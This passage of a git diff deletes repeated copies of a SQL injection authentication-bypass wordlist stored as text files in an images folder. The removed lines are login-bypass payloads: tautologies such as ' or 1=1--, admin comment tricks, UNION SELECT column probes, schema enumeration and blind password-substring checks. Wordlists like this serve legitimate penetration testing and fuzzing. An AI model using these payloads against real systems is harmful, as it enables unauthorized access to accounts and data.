-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
